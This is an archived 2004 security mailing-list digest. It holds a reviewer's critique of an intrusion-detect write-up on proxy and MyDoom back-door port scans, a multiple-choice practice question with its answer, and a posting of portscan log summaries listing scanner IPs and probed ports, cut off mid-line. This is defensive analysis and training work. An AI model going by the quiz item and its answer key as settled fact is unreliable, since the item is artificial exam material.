please use theremarks: JPNIC whois > server at whois.nic.ad.jp. (This defaults toremarks: > Japanese output, use the /e switch for English > output)changed: apnic-ftp at nic.ad.jp 20040609source: JPNIC > > In that it is a valid IP address according to APNIC and the > ports that are being probed may return some type of response > to allow the hacker to gain access to the system leads me to > believe that the IP address is not spoofed. Did you notify the abuse department listed above? > > > > 4. Description of attack: > > > The attack is obviously a scan for Socks and squid proxies in YES > attempt to locate a compromised system or one that is running Compromised? > the service to exploit possible vulnerabilities within the service. > > > > A CVE that covers the squid proxy vulnerability can be found > at the following URL: > http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0068 > > > > A CAN, which is under review at this time, that covers the > socks proxy vulnerability can be found at the following URL: > http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0315 > > > > Along with the proxies, the attacker appears to be probing > for port 3127. This port is left open as a back door by the > myDoom virus[1] which in future could be an avenue for a > denial of service attack in the future, according to CERT at > http://www.cert.org/incident_notes/IN-2004-01.html. Some servers scan for proxies to prevent spammers from using open proxies to send mail to them. Did you check and see what that ip is? > > > > 5. Attack mechanism: > > > The attacker is probing the network in search of responding > ports. Since there are no other logs to correlate with, I > can only assume that the TCP packets that are being sent are > to elicit some response to find a listening or compromised > host. For example, the attacker sends an unsolicited TCP > packet with the ACK flag set. The normal response would be > for the host to respond back with RST. If that is indeed the > case, the attacker now knows that: 1) the host is alive and > listening, and 2) there is no filtering in place. Again details on the packets might have given you a better clue as to what was going on. > > > > If the attacker receives no response then he can assume: 1) > some type of filtering is in place, or 2) that the host is not alive. Any other possibilities? > > > > If the attacker receives the response that is being solicited > then he can attempt to exploit the vulnerabilities with a > buffer overflow using specially crafted packets. In the case > of the back door left by the myDoom virus, the attacker could > possible take control of that system to launch a denial of > service attack. > > > > 6. Correlations: > > > I found a posting at > http://lists.sans.org/pipermail/unisog/2004-March/006955.php > that states that they had seen some scans, particularly on > the weekends, just a couple of months back. I was unable to > see any other postings to correlate my findings. > > > > 7. Evidence of active targeting: > > > It appears to be targeted in the sense that it is targeting > three specific ports as possible back doors to compromised > systems. Also, the attacker is scanning the full range of > addresses on this particular subnet. The scans are not rapid > in succession but fairly consistent. > > > > 8. Severity: > > > severity = (criticality + lethality) - (system > countermeasures + network countermeasures) > > Each value is ranked on a scale from 1 (lowest) to 5 (highest). > > > > Criticality: 2 > > > > I believe that criticality is low based on the fact that we > do not run socks or squid proxies on our network. It is > possible that the myDoom virus could be introduced but active > virus scanning with updated definitions is in use. > > > > Lethality: 3 > > > > I do not think that this scan in itself is very lethal but > the nature of business on my network a compromise could be > very lethal. A continued monitoring of this type of scan and > any other associated IP addresses should be considered. > > > > System countermeasures: 2 > > > > The systems on this network are patched and updated regularly > or as they become available. The systems administrators do a > fair job of ensuring that the systems are secure and up to date. > > > > Network countermeasures: 3 > > > > I am happy to say that this scan was denied at the border > router. The network currently uses a defense-in-depth > approach. Inside the border router, using extensive ACLs, is > monitored by a network IDS. A firewall is then in place that > all traffic to the internal network is routed through. The > internal network is monitored by multiple network IDS on > various segments along with Cisco IDS modules in the > switches. Correlation with various agencies allows us to put > preventative measures up at the border ahead of time. You might want to do a network description above since you know the network. > > > > 9. Defensive Recommendations: > > > The border router should be configured to block incoming > requests for services that are not in use or vulnerable to > remote access. If the scan is coming from a specific host, > then that IP address can be blocked at the router. > Firewalls, should also be set to block any unused services. > Since the scan also includes the port commonly associated > with the myDoom virus, a full system scan with updated > definitions should be done on all systems to ensure that none > of the systems have been compromised. > > > > 10. Multiple choice test question: > > > What range of ports does the myDoom virus open up and listen on? Mydoom.a or .b? > > > > a. 4200-4000 > > b. 3127-3198 > > c. 1024-1029 > > d. 135-139 > > > > Answer: b. > > A system that has been compromised by the myDoom virus opens > ports 3127-3198, according to CERT > http://www.cert.org/incident_notes/IN-2004-> 01.html. > > > > > > -------------------------------------------------------------- > ------------------ > > [1] LinkLogger > _______________________________________________ > Intrusions mailing list > Intrusions at lists.sans.org > http://www.dshield.org/mailman/listinfo/intrusions > From Ken.Connelly at uni.edu Fri Jul 2 15:28:40 2004 From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu) Date: Fri, 02 Jul 2004 10:28:40 -0500 (CDT) Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects Message-ID: <01LBZDXB7W908YBZ2Y@uni.edu> The following extracts show the beginning and ending of scan activity was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500. Jul 1 11:31:41 218.56.0.58:38350 -> xxx.yyy.1.0:1433 SYN ******S* Jul 1 11:31:41 218.56.0.58:38397 -> xxx.yyy.1.1:1433 SYN ******S* Jul 1 11:31:41 218.56.0.58:38399 -> xxx.yyy.1.2:1433 SYN ******S* Jul 1 11:31:41 218.56.0.58:38403 -> xxx.yyy.1.3:1433 SYN ******S* Jul 1 11:31:38 218.56.0.58:38406 -> xxx.yyy.1.4:1433 SYN ******S* Jul 1 11:31:38 218.56.0.58:38411 -> xxx.yyy.1.5:1433 SYN ******S* Jul 1 11:31:39 218.56.0.58:38422 -> xxx.yyy.1.6:1433 SYN ******S* Jul 1 11:31:39 218.56.0.58:38426 -> xxx.yyy.1.7:1433 SYN ******S* [...] Jul 1 15:20:31 218.56.0.58:40234 -> xxx.yyy.255.247:1433 SYN ******S* Jul 1 15:20:31 218.56.0.58:40261 -> xxx.yyy.255.248:1433 SYN ******S* Jul 1 15:20:31 218.56.0.58:40312 -> xxx.yyy.255.250:1433 SYN ******S* Jul 1 15:20:31 218.56.0.58:40295 -> xxx.yyy.255.249:1433 SYN ******S* Jul 1 15:20:32 218.56.0.58:40350 -> xxx.yyy.255.251:1433 SYN ******S* Jul 1 15:20:32 218.56.0.58:40363 -> xxx.yyy.255.253:1433 SYN ******S* Jul 1 15:20:32 218.56.0.58:40356 -> xxx.yyy.255.252:1433 SYN ******S* Jul 1 15:20:32 218.56.0.58:40394 -> xxx.yyy.255.254:1433 SYN ******S* 119463 Jul 1 14:33:34 218.64.88.131:3684 -> xxx.yyy.1.0:139 SYN ******S* Jul 1 14:33:31 218.64.88.131:3685 -> xxx.yyy.1.1:139 SYN ******S* Jul 1 14:33:34 218.64.88.131:3689 -> xxx.yyy.1.2:139 SYN ******S* Jul 1 14:33:34 218.64.88.131:3690 -> xxx.yyy.1.3:139 SYN ******S* Jul 1 14:33:34 218.64.88.131:3691 -> xxx.yyy.1.4:139 SYN ******S* Jul 1 14:33:34 218.64.88.131:3692 -> xxx.yyy.1.5:139 SYN ******S* Jul 1 14:33:34 218.64.88.131:3694 -> xxx.yyy.1.7:139 SYN ******S* Jul 1 14:33:34 218.64.88.131:3698 -> xxx.yyy.1.11:139 SYN ******S* [...] Jul 1 14:56:59 218.64.88.131:3788 -> xxx.yyy.255.246:139 SYN ******S* Jul 1 14:56:59 218.64.88.131:3784 -> xxx.yyy.255.244:139 SYN ******S* Jul 1 14:56:59 218.64.88.131:3789 -> xxx.yyy.255.247:139 SYN ******S* Jul 1 14:56:59 218.64.88.131:3804 -> xxx.yyy.255.253:139 SYN ******S* Jul 1 14:56:59 218.64.88.131:3797 -> xxx.yyy.255.251:139 SYN ******S* Jul 1 14:56:59 218.64.88.131:3791 -> xxx.yyy.255.249:139 SYN ******S* Jul 1 14:56:59 218.64.88.131:3792 -> xxx.yyy.255.250:139 SYN ******S* Jul 1 14:56:59 218.64.88.131:3798 -> xxx.yyy.255.252:139 SYN ******S* 99404 Jul 1 03:30:29 80.80.19.12:2467 -> xxx.yyy.1.1:139 SYN ******S* Jul 1 03:30:29 80.80.19.12:2468 -> xxx.yyy.1.2:139 SYN ******S* Jul 1 03:30:29 80.80.19.12:2469 -> xxx.yyy.1.3:139 SYN ******S* Jul 1 03:30:26 80.80.19.12:2470 -> xxx.yyy.1.4:139 SYN ******S* Jul 1 03:30:29 80.80.19.12:2471 -> xxx.yyy.1.5:139 SYN ******S* Jul 1 03:30:29 80.80.19.12:2472 -> xxx.yyy.1.6:139 SYN ******S* Jul 1 03:30:29 80.80.19.12:2473 -> xxx.yyy.1.7:139 SYN ******S* Jul 1 03:30:29 80.80.19.12:2474 -> xxx.yyy.1.8:139 SYN ******S* [...] Jul 1 03:41:22 80.80.19.12:2524 -> xxx.yyy.255.190:139 SYN ******S* Jul 1 03:41:22 80.80.19.12:2521 -> xxx.yyy.255.187:139 SYN ******S* Jul 1 03:41:22 80.80.19.12:2525 -> xxx.yyy.255.191:139 SYN ******S* Jul 1 03:41:22 80.80.19.12:2519 -> xxx.yyy.255.185:139 SYN ******S* Jul 1 03:41:22 80.80.19.12:2522 -> xxx.yyy.255.188:139 SYN ******S* Jul 1 03:41:23 80.80.19.12:2530 -> xxx.yyy.255.196:139 SYN ******S* Jul 1 03:41:23 80.80.19.12:2531 -> xxx.yyy.255.197:139 SYN ******S* Jul 1 03:41:23 80.80.19.12:2529 -> xxx.yyy.255.195:139 SYN ******S* 74490 Jul 1 03:03:18 195.66.179.252:3758 -> xxx.yyy.1.1:139 SYN ******S* Jul 1 03:03:15 195.66.179.252:3759 -> xxx.yyy.1.2:139 SYN ******S* Jul 1 03:03:18 195.66.179.252:3760 -> xxx.yyy.1.3:139 SYN ******S* Jul 1 03:03:18 195.66.179.252:3761 -> xxx.yyy.1.4:139 SYN ******S* Jul 1 03:03:18 195.66.179.252:3762 -> xxx.yyy.1.5:139 SYN ******S* Jul 1 03:03:18 195.66.179.252:3763 -> xxx.yyy.1.6:139 SYN ******S* Jul 1 03:03:18 195.66.179.252:3764 -> xxx.yyy.1.7:139 SYN ******S* Jul 1 03:03:18 195.66.179.252:3765 -> xxx.yyy.1.8:139 SYN ******S* [...] Jul 1 03:14:30 195.66.179.252:2533 -> xxx.yyy.255.238:139 SYN ******S* Jul 1 03:14:30 195.66.179.252:2536 -> xxx.yyy.255.241:139 SYN ******S* Jul 1 03:14:30 195.66.179.252:2546 -> xxx.yyy.255.251:139 SYN ******S* Jul 1 03:14:30 195.66.179.252:2543 -> xxx.yyy.255.248:139 SYN ******S* Jul 1 03:14:30 195.66.179.252:2547 -> xxx.yyy.255.252:139 SYN ******S* Jul 1 03:14:30 195.66.179.252:2544 -> xxx.yyy.255.249:139 SYN ******S* Jul 1 03:14:30 195.66.179.252:2548 -> xxx.yyy.255.253:139 SYN ******S* Jul 1 03:14:30 195.66.179.252:2545 -> xxx.yyy.255.250:139 SYN ******S* Jul 1 03:14:30 195.66.179.252:2549 -> xxx.yyy.255.254:139 SYN ******S* 74344 Jul 1 09:31:09 4.19.130.211:2038 -> xxx.yyy.1.1:1433 SYN ******S* Jul 1 09:31:09 4.19.130.211:2039 -> xxx.yyy.1.2:1433 SYN ******S* Jul 1 09:31:09 4.19.130.211:2040 -> xxx.yyy.1.3:1433 SYN ******S* Jul 1 09:31:09 4.19.130.211:2041 -> xxx.yyy.1.4:1433 SYN ******S* Jul 1 09:31:09 4.19.130.211:2042 -> xxx.yyy.1.5:1433 SYN ******S* Jul 1 09:31:09 4.19.130.211:2043 -> xxx.yyy.1.6:1433 SYN ******S* Jul 1 09:31:06 4.19.130.211:2044 -> xxx.yyy.1.7:1433 SYN ******S* Jul 1 09:31:09 4.19.130.211:2045 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 1 09:42:56 4.19.130.211:3703 -> xxx.yyy.255.244:1433 SYN ******S* Jul 1 09:42:56 4.19.130.211:3709 -> xxx.yyy.255.250:1433 SYN ******S* Jul 1 09:42:56 4.19.130.211:3706 -> xxx.yyy.255.247:1433 SYN ******S* Jul 1 09:42:56 4.19.130.211:3710 -> xxx.yyy.255.251:1433 SYN ******S* Jul 1 09:42:56 4.19.130.211:3707 -> xxx.yyy.255.248:1433 SYN ******S* Jul 1 09:42:56 4.19.130.211:3704 -> xxx.yyy.255.245:1433 SYN ******S* Jul 1 09:42:56 4.19.130.211:3711 -> xxx.yyy.255.252:1433 SYN ******S* Jul 1 09:42:56 4.19.130.211:3713 -> xxx.yyy.255.254:1433 SYN ******S* 72803 Jul 1 14:12:58 147.31.180.129:3199 -> xxx.yyy.1.1:4000 SYN ******S* Jul 1 14:12:58 147.31.180.129:3200 -> xxx.yyy.1.2:4000 SYN ******S* Jul 1 14:12:58 147.31.180.129:3201 -> xxx.yyy.1.3:4000 SYN ******S* Jul 1 14:12:57 147.31.180.129:3202 -> xxx.yyy.1.4:4000 SYN ******S* Jul 1 14:12:57 147.31.180.129:3203 -> xxx.yyy.1.5:4000 SYN ******S* Jul 1 14:13:00 147.31.180.129:3204 -> xxx.yyy.1.6:4000 SYN ******S* Jul 1 14:13:00 147.31.180.129:3205 -> xxx.yyy.1.7:4000 SYN ******S* Jul 1 14:13:00 147.31.180.129:3206 -> xxx.yyy.1.8:4000 SYN ******S* [...] Jul 1 14:24:58 147.31.180.129:4781 -> xxx.yyy.255.211:4000 SYN ******S* Jul 1 14:24:58 147.31.180.129:4782 -> xxx.yyy.255.212:4000 SYN ******S* Jul 1 14:24:58 147.31.180.129:4786 -> xxx.yyy.255.216:4000 SYN ******S* Jul 1 14:24:58 147.31.180.129:4783 -> xxx.yyy.255.213:4000 SYN ******S* Jul 1 14:24:58 147.31.180.129:4784 -> xxx.yyy.255.214:4000 SYN ******S* Jul 1 14:24:58 147.31.180.129:4780 -> xxx.yyy.255.210:4000 SYN ******S* Jul 1 14:24:59 147.31.180.129:4789 -> xxx.yyy.255.219:4000 SYN ******S* Jul 1 14:24:59 147.31.180.129:4790 -> xxx.yyy.255.220:4000 SYN ******S* 69734 Jul 1 18:36:48 61.153.9.3:2389 -> xxx.yyy.1.0:1433 SYN ******S* Jul 1 18:36:48 61.153.9.3:2390 -> xxx.yyy.1.1:1433 SYN ******S* Jul 1 18:36:45 61.153.9.3:2391 -> xxx.yyy.1.2:1433 SYN ******S* Jul 1 18:36:48 61.153.9.3:2392 -> xxx.yyy.1.3:1433 SYN ******S* Jul 1 18:36:45 61.153.9.3:2393 -> xxx.yyy.1.4:1433 SYN ******S* Jul 1 18:36:48 61.153.9.3:2394 -> xxx.yyy.1.5:1433 SYN ******S* Jul 1 18:36:45 61.153.9.3:2395 -> xxx.yyy.1.6:1433 SYN ******S* Jul 1 18:36:48 61.153.9.3:2396 -> xxx.yyy.1.7:1433 SYN ******S* [...] Jul 1 22:25:31 61.153.9.3:1739 -> xxx.yyy.255.240:1433 SYN ******S* Jul 1 22:25:31 61.153.9.3:1741 -> xxx.yyy.255.242:1433 SYN ******S* Jul 1 22:25:31 61.153.9.3:1743 -> xxx.yyy.255.244:1433 SYN ******S* Jul 1 22:25:31 61.153.9.3:1744 -> xxx.yyy.255.245:1433 SYN ******S* Jul 1 22:25:31 61.153.9.3:1745 -> xxx.yyy.255.246:1433 SYN ******S* Jul 1 22:25:31 61.153.9.3:1746 -> xxx.yyy.255.247:1433 SYN ******S* Jul 1 22:25:32 61.153.9.3:1748 -> xxx.yyy.255.249:1433 SYN ******S* Jul 1 22:25:32 61.153.9.3:1752 -> xxx.yyy.255.253:1433 SYN ******S* 69023 Jul 1 17:11:13 61.222.172.54:56482 -> xxx.yyy.1.0:443 SYN ******S* Jul 1 17:11:13 61.222.172.54:56483 -> xxx.yyy.1.1:443 SYN ******S* Jul 1 17:11:13 61.222.172.54:56484 -> xxx.yyy.1.2:443 SYN ******S* Jul 1 17:11:13 61.222.172.54:56485 -> xxx.yyy.1.3:443 SYN ******S* Jul 1 17:11:16 61.222.172.54:56486 -> xxx.yyy.1.4:443 SYN ******S* Jul 1 17:11:13 61.222.172.54:56487 -> xxx.yyy.1.5:443 SYN ******S* Jul 1 17:11:16 61.222.172.54:56488 -> xxx.yyy.1.6:443 SYN ******S* Jul 1 17:11:16 61.222.172.54:56489 -> xxx.yyy.1.7:443 SYN ******S* [...] Jul 1 17:20:11 61.222.172.54:36892 -> xxx.yyy.243.44:80 SYN ******S* Jul 1 17:20:11 61.222.172.54:36893 -> xxx.yyy.244.55:80 SYN ******S* Jul 1 17:20:11 61.222.172.54:36894 -> xxx.yyy.244.7:80 SYN ******S* Jul 1 17:20:11 61.222.172.54:36895 -> xxx.yyy.244.92:80 SYN ******S* Jul 1 17:20:11 61.222.172.54:36896 -> xxx.yyy.248.231:80 SYN ******S* Jul 1 17:20:11 61.222.172.54:36897 -> xxx.yyy.248.4:80 SYN ******S* Jul 1 17:20:11 61.222.172.54:36898 -> xxx.yyy.248.80:80 SYN ******S* Jul 1 17:20:11 61.222.172.54:36899 -> xxx.yyy.249.5:80 SYN ******S* Jul 1 17:20:11 61.222.172.54:36901 -> xxx.yyy.253.39:80 SYN ******S* 61383 Jul 1 03:52:31 217.88.214.44:3426 -> xxx.yyy.1.1:8000 SYN ******S* Jul 1 03:52:31 217.88.214.44:3427 -> xxx.yyy.1.2:8000 SYN ******S* Jul 1 03:52:31 217.88.214.44:3428 -> xxx.yyy.1.3:8000 SYN ******S* Jul 1 03:52:32 217.88.214.44:3429 -> xxx.yyy.1.4:8000 SYN ******S* Jul 1 03:52:32 217.88.214.44:3430 -> xxx.yyy.1.5:8000 SYN ******S* Jul 1 03:52:29 217.88.214.44:3431 -> xxx.yyy.1.6:8000 SYN ******S* Jul 1 03:52:29 217.88.214.44:3432 -> xxx.yyy.1.7:8000 SYN ******S* Jul 1 03:52:32 217.88.214.44:3433 -> xxx.yyy.1.8:8000 SYN ******S* [...] Jul 1 04:03:26 217.88.214.44:4110 -> xxx.yyy.255.150:8000 SYN ******S* Jul 1 04:03:26 217.88.214.44:4117 -> xxx.yyy.255.157:8000 SYN ******S* Jul 1 04:03:26 217.88.214.44:4118 -> xxx.yyy.255.158:8000 SYN ******S* Jul 1 04:03:26 217.88.214.44:4119 -> xxx.yyy.255.159:8000 SYN ******S* Jul 1 04:03:27 217.88.214.44:4127 -> xxx.yyy.255.167:8000 SYN ******S* Jul 1 04:03:27 217.88.214.44:4128 -> xxx.yyy.255.168:8000 SYN ******S* Jul 1 04:03:27 217.88.214.44:4129 -> xxx.yyy.255.169:8000 SYN ******S* Jul 1 04:03:27 217.88.214.44:4130 -> xxx.yyy.255.170:8000 SYN ******S* Jul 1 04:03:27 217.88.214.44:4177 -> xxx.yyy.255.216:8000 SYN ******S* 51022 Jul 1 13:04:02 4.131.17.234:4052 -> xxx.yyy.104.2:1433 SYN ******S* Jul 1 13:04:02 4.131.17.234:4033 -> xxx.yyy.104.0:1433 SYN ******S* Jul 1 13:04:02 4.131.17.234:4050 -> xxx.yyy.104.1:1433 SYN ******S* Jul 1 13:04:02 4.131.17.234:4113 -> xxx.yyy.104.3:1433 SYN ******S* Jul 1 13:04:03 4.131.17.234:4194 -> xxx.yyy.104.5:1433 SYN ******S* Jul 1 13:04:06 4.131.17.234:4214 -> xxx.yyy.104.6:1433 SYN ******S* Jul 1 13:04:04 4.131.17.234:4189 -> xxx.yyy.104.4:1433 SYN ******S* Jul 1 13:04:05 4.131.17.234:4235 -> xxx.yyy.104.7:1433 SYN ******S* [...] Jul 1 14:29:38 4.131.17.234:3914 -> xxx.yyy.199.135:1433 SYN ******S* Jul 1 14:29:38 4.131.17.234:3915 -> xxx.yyy.199.136:1433 SYN ******S* Jul 1 14:29:38 4.131.17.234:3327 -> xxx.yyy.199.77:1433 SYN ******S* Jul 1 14:29:39 4.131.17.234:3692 -> xxx.yyy.199.105:1433 SYN ******S* Jul 1 14:29:39 4.131.17.234:3336 -> xxx.yyy.199.78:1433 SYN ******S* Jul 1 14:29:39 4.131.17.234:3934 -> xxx.yyy.199.137:1433 SYN ******S* Jul 1 14:29:39 4.131.17.234:3703 -> xxx.yyy.199.106:1433 SYN ******S* Jul 1 14:29:39 4.131.17.234:3948 -> xxx.yyy.199.138:1433 SYN ******S* 48622 Jul 1 01:15:25 211.141.118.92:3772 -> xxx.yyy.1.1:4899 SYN ******S* Jul 1 01:15:25 211.141.118.92:3774 -> xxx.yyy.1.2:4899 SYN ******S* Jul 1 01:15:25 211.141.118.92:3778 -> xxx.yyy.1.3:4899 SYN ******S* Jul 1 01:15:23 211.141.118.92:3779 -> xxx.yyy.1.4:4899 SYN ******S* Jul 1 01:15:23 211.141.118.92:3780 -> xxx.yyy.1.5:4899 SYN ******S* Jul 1 01:15:23 211.141.118.92:3782 -> xxx.yyy.1.6:4899 SYN ******S* Jul 1 01:15:23 211.141.118.92:3786 -> xxx.yyy.1.8:4899 SYN ******S* Jul 1 01:15:23 211.141.118.92:3794 -> xxx.yyy.1.9:4899 SYN ******S* [...] Jul 1 01:19:00 211.141.118.92:3592 -> xxx.yyy.255.151:4899 SYN ******S* Jul 1 01:19:00 211.141.118.92:3613 -> xxx.yyy.255.164:4899 SYN ******S* Jul 1 01:19:00 211.141.118.92:3616 -> xxx.yyy.255.167:4899 SYN ******S* Jul 1 01:19:00 211.141.118.92:3595 -> xxx.yyy.255.154:4899 SYN ******S* Jul 1 01:19:00 211.141.118.92:3603 -> xxx.yyy.255.156:4899 SYN ******S* Jul 1 01:19:00 211.141.118.92:3619 -> xxx.yyy.255.170:4899 SYN ******S* Jul 1 01:19:00 211.141.118.92:3611 -> xxx.yyy.255.162:4899 SYN ******S* Jul 1 01:19:00 211.141.118.92:3608 -> xxx.yyy.255.159:4899 SYN ******S* 45413 Jul 1 05:34:50 209.177.247.82:2669 -> xxx.yyy.1.1:4899 SYN ******S* Jul 1 05:34:50 209.177.247.82:2670 -> xxx.yyy.1.2:4899 SYN ******S* Jul 1 05:34:50 209.177.247.82:2671 -> xxx.yyy.1.3:4899 SYN ******S* Jul 1 05:34:49 209.177.247.82:2672 -> xxx.yyy.1.4:4899 SYN ******S* Jul 1 05:34:49 209.177.247.82:2673 -> xxx.yyy.1.5:4899 SYN ******S* Jul 1 05:34:49 209.177.247.82:2674 -> xxx.yyy.1.6:4899 SYN ******S* Jul 1 05:34:49 209.177.247.82:2675 -> xxx.yyy.1.7:4899 SYN ******S* Jul 1 05:34:49 209.177.247.82:2676 -> xxx.yyy.1.8:4899 SYN ******S* [...] Jul 1 05:39:48 209.177.247.82:1777 -> xxx.yyy.255.247:4899 SYN ******S* Jul 1 05:39:48 209.177.247.82:1778 -> xxx.yyy.255.248:4899 SYN ******S* Jul 1 05:39:48 209.177.247.82:1779 -> xxx.yyy.255.249:4899 SYN ******S* Jul 1 05:39:48 209.177.247.82:1780 -> xxx.yyy.255.250:4899 SYN ******S* Jul 1 05:39:48 209.177.247.82:1781 -> xxx.yyy.255.251:4899 SYN ******S* Jul 1 05:39:48 209.177.247.82:1782 -> xxx.yyy.255.252:4899 SYN ******S* Jul 1 05:39:48 209.177.247.82:1783 -> xxx.yyy.255.253:4899 SYN ******S* Jul 1 05:39:48 209.177.247.82:1784 -> xxx.yyy.255.254:4899 SYN ******S* 44858 Jul 1 21:38:35 212.62.131.5:1856 -> xxx.yyy.1.0:139 SYN ******S* Jul 1 21:38:35 212.62.131.5:1858 -> xxx.yyy.1.1:139 SYN ******S* Jul 1 21:38:35 212.62.131.5:1860 -> xxx.yyy.1.2:139 SYN ******S* Jul 1 21:38:35 212.62.131.5:1862 -> xxx.yyy.1.3:139 SYN ******S* Jul 1 21:38:35 212.62.131.5:1864 -> xxx.yyy.1.4:139 SYN ******S* Jul 1 21:38:35 212.62.131.5:1866 -> xxx.yyy.1.5:139 SYN ******S* Jul 1 21:38:35 212.62.131.5:1868 -> xxx.yyy.1.6:139 SYN ******S* Jul 1 21:38:35 212.62.131.5:1870 -> xxx.yyy.1.7:139 SYN ******S* [...] Jul 1 21:39:27 212.62.131.5:1872 -> xxx.yyy.255.238:139 SYN ******S* Jul 1 21:39:27 212.62.131.5:1824 -> xxx.yyy.255.239:139 SYN ******S* Jul 1 21:39:27 212.62.131.5:1826 -> xxx.yyy.255.240:139 SYN ******S* Jul 1 21:39:27 212.62.131.5:1838 -> xxx.yyy.255.246:139 SYN ******S* Jul 1 21:39:27 212.62.131.5:1840 -> xxx.yyy.255.247:139 SYN ******S* Jul 1 21:39:27 212.62.131.5:1842 -> xxx.yyy.255.248:139 SYN ******S* Jul 1 21:39:27 212.62.131.5:1844 -> xxx.yyy.255.249:139 SYN ******S* Jul 1 21:39:27 212.62.131.5:1846 -> xxx.yyy.255.250:139 SYN ******S* Jul 1 21:39:27 212.62.131.5:1854 -> xxx.yyy.255.254:139 SYN ******S* 38786 Jul 1 08:14:30 61.155.107.210:63290 -> xxx.yyy.1.1:4899 SYN ******S* Jul 1 08:14:30 61.155.107.210:46435 -> xxx.yyy.1.3:4899 SYN ******S* Jul 1 08:14:30 61.155.107.210:54528 -> xxx.yyy.1.5:4899 SYN ******S* Jul 1 08:14:30 61.155.107.210:33439 -> xxx.yyy.1.7:4899 SYN ******S* Jul 1 08:14:30 61.155.107.210:6686 -> xxx.yyy.1.10:4899 SYN ******S* Jul 1 08:14:32 61.155.107.210:28488 -> xxx.yyy.1.14:4899 SYN ******S* Jul 1 08:14:30 61.155.107.210:40868 -> xxx.yyy.1.16:4899 SYN ******S* Jul 1 08:14:30 61.155.107.210:60856 -> xxx.yyy.1.17:4899 SYN ******S* [...] Jul 1 08:31:00 61.155.107.210:20502 -> xxx.yyy.255.114:4899 SYN ******S* Jul 1 08:31:00 61.155.107.210:29773 -> xxx.yyy.255.118:4899 SYN ******S* Jul 1 08:31:00 61.155.107.210:64287 -> xxx.yyy.255.128:4899 SYN ******S* Jul 1 08:31:02 61.155.107.210:42074 -> xxx.yyy.255.241:4899 SYN ******S* Jul 1 08:31:02 61.155.107.210:45808 -> xxx.yyy.255.240:4899 SYN ******S* Jul 1 08:31:02 61.155.107.210:13425 -> xxx.yyy.255.244:4899 SYN ******S* Jul 1 08:31:02 61.155.107.210:19462 -> xxx.yyy.255.242:4899 SYN ******S* Jul 1 08:31:02 61.155.107.210:63687 -> xxx.yyy.255.239:4899 SYN ******S* Jul 1 08:31:02 61.155.107.210:53999 -> xxx.yyy.255.245:4899 SYN ******S* 22912 Jul 1 11:31:47 4.131.22.180:3085 -> xxx.yyy.1.5:1433 SYN ******S* Jul 1 11:31:47 4.131.22.180:3101 -> xxx.yyy.1.11:1433 SYN ******S* Jul 1 11:31:47 4.131.22.180:3056 -> xxx.yyy.1.0:1433 SYN ******S* Jul 1 11:31:47 4.131.22.180:3083 -> xxx.yyy.1.3:1433 SYN ******S* Jul 1 11:31:47 4.131.22.180:3086 -> xxx.yyy.1.6:1433 SYN ******S* Jul 1 11:31:47 4.131.22.180:3103 -> xxx.yyy.1.12:1433 SYN ******S* Jul 1 11:31:47 4.131.22.180:3105 -> xxx.yyy.1.13:1433 SYN ******S* Jul 1 11:31:47 4.131.22.180:3071 -> xxx.yyy.1.1:1433 SYN ******S* [...] Jul 1 12:50:36 4.131.22.180:4985 -> xxx.yyy.88.192:1433 SYN ******S* Jul 1 12:50:36 4.131.22.180:3418 -> xxx.yyy.88.230:1433 SYN ******S* Jul 1 12:50:36 4.131.22.180:3423 -> xxx.yyy.88.231:1433 SYN ******S* Jul 1 12:50:36 4.131.22.180:3435 -> xxx.yyy.88.232:1433 SYN ******S* Jul 1 12:50:36 4.131.22.180:3380 -> xxx.yyy.88.223:1433 SYN ******S* Jul 1 12:50:36 4.131.22.180:3416 -> xxx.yyy.88.229:1433 SYN ******S* Jul 1 12:50:36 4.131.22.180:3020 -> xxx.yyy.88.193:1433 SYN ******S* Jul 1 12:50:36 4.131.22.180:4984 -> xxx.yyy.88.191:1433 SYN ******S* Jul 1 12:50:36 4.131.22.180:3382 -> xxx.yyy.88.224:1433 SYN ******S* 20685 Jul 1 10:36:14 82.37.132.10:1179 -> xxx.yyy.1.0:1433 SYN ******S* Jul 1 10:36:17 82.37.132.10:1181 -> xxx.yyy.1.1:1433 SYN ******S* Jul 1 10:36:17 82.37.132.10:1189 -> xxx.yyy.1.4:1433 SYN ******S* Jul 1 10:36:17 82.37.132.10:1194 -> xxx.yyy.1.5:1433 SYN ******S* Jul 1 10:36:17 82.37.132.10:1197 -> xxx.yyy.1.6:1433 SYN ******S* Jul 1 10:36:17 82.37.132.10:1201 -> xxx.yyy.1.7:1433 SYN ******S* Jul 1 10:36:17 82.37.132.10:1204 -> xxx.yyy.1.8:1433 SYN ******S* Jul 1 10:36:17 82.37.132.10:1207 -> xxx.yyy.1.9:1433 SYN ******S* [...] Jul 1 11:47:31 82.37.132.10:2474 -> xxx.yyy.79.245:1433 SYN ******S* Jul 1 11:47:31 82.37.132.10:2473 -> xxx.yyy.79.244:1433 SYN ******S* Jul 1 11:47:31 82.37.132.10:2477 -> xxx.yyy.79.246:1433 SYN ******S* Jul 1 11:47:31 82.37.132.10:2480 -> xxx.yyy.79.249:1433 SYN ******S* Jul 1 11:47:31 82.37.132.10:2479 -> xxx.yyy.79.248:1433 SYN ******S* Jul 1 11:47:31 82.37.132.10:2478 -> xxx.yyy.79.247:1433 SYN ******S* Jul 1 11:47:31 82.37.132.10:2807 -> xxx.yyy.80.37:1433 SYN ******S* Jul 1 11:47:31 82.37.132.10:2482 -> xxx.yyy.79.250:1433 SYN ******S* Jul 1 11:47:31 82.37.132.10:2483 -> xxx.yyy.79.251:1433 SYN ******S* 18521 Jul 1 23:56:38 202.223.103.18:2814 -> xxx.yyy.133.236:5554 SYN ******S* Jul 1 23:56:39 202.223.103.18:3524 -> xxx.yyy.133.236:1023 SYN ******S* Jul 1 23:56:38 202.223.103.18:2813 -> xxx.yyy.133.235:5554 SYN ******S* Jul 1 23:56:39 202.223.103.18:3521 -> xxx.yyy.133.235:1023 SYN ******S* Jul 1 23:56:41 202.223.103.18:1556 -> xxx.yyy.133.235:9898 SYN ******S* Jul 1 23:56:38 202.223.103.18:2815 -> xxx.yyy.133.237:5554 SYN ******S* Jul 1 23:56:39 202.223.103.18:3539 -> xxx.yyy.133.237:1023 SYN ******S* Jul 1 23:56:41 202.223.103.18:1566 -> 